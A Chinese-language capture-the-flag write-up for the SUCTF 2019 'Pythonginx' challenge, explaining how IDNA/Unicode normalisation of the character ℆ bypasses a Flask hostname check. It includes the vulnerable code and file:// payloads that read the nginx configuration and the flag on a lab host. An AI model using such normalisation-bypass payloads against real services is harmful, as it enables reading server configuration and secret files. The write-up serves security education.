[SUCTF 2019]Pythonginx

贴出源码

         @app.route('/getUrl', methods=['GET', 'POST'])
 def getUrl():
     url = request.args.get("url")
     host = parse.urlparse(url).hostname
     #解析url，赋值hostname
     if host == 'suctf.cc':
         return "我扌 your problem? 111"
     parts = list(urlsplit(url))
     #list() 方法用于将元组转换为列表。
     #parse.urlprase方法    将url分为6个部分，返回一个包含6个字符串项目的元组：协议、位置、路径、参数、查询、片段。
     #ParseResult(scheme='https', netloc='i.cnblogs.com', path='/EditPosts.aspx', params='', query='opt=1', fragment='')
     #其中 scheme 是协议  netloc 是域名服务器  path 相对路径  params是参数，query是查询的条件
     host = parts[1]
     if host == 'suctf.cc':
         return "我扌 your problem? 222 " + host
     newhost = []
     for h in host.split('.'):
         # split() 通过指定分隔符对字符串进行切片，如果参数 num 有指定值，则分隔 num+1 个子字符串，返回分割后的字符串列表。
         newhost.append(h.encode('idna').decode('utf-8'))
         #append()方法用于将传入的对象附加(添加)到现有列表中。
     parts[1] = '.'.join(newhost)
     #Python join() 方法用于将序列中的元素以指定的字符连接生成一个新的字符串。

     #去掉 url 中的空格
     finalUrl = urlunsplit(parts).split(' ')[0]
     host = parse.urlparse(finalUrl).hostname
     if host == 'suctf.cc':
         return urllib.request.urlopen(finalUrl).read()
     else:
         return "我扌 your problem? 333"

关键代码在第19行

  newhost.append(h.encode('idna').decode('utf-8'))

这里将域名每个部分进行idna编码后，再utf-8解码

利用点转码上的问题

这个漏洞在2019black hat进行了讨论

参考链接：

https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf

https://www.cnblogs.com/cimuhuashuimu/p/11490431.html

漏洞产生的原因是各国语言的编码形式在进行转换时，会以不同的形式呈现，导致可以构造可以利用的恶意url

根据代码审计

我们需要绕过前两个if判断，进入第三个if判断去利用read()函数

简单来说就是

在前两个判断时不能是suctf.cc

第三个是suctf.cc

利用方式：

题目告诉了我们使用的是nginx

所以去读nginx配置文件

字符℆ 在后台转码会解析为c/u

由此我们可以构造payload如下

payload：

file://suctf.c℆sr/local/nginx/conf/nginx.conf

http://d7844ab4-68f7-4e76-9432-a112b65afa1f.node3.buuoj.cn/getUrl?url=file://suctf.c%E2%84%86sr/fffffflag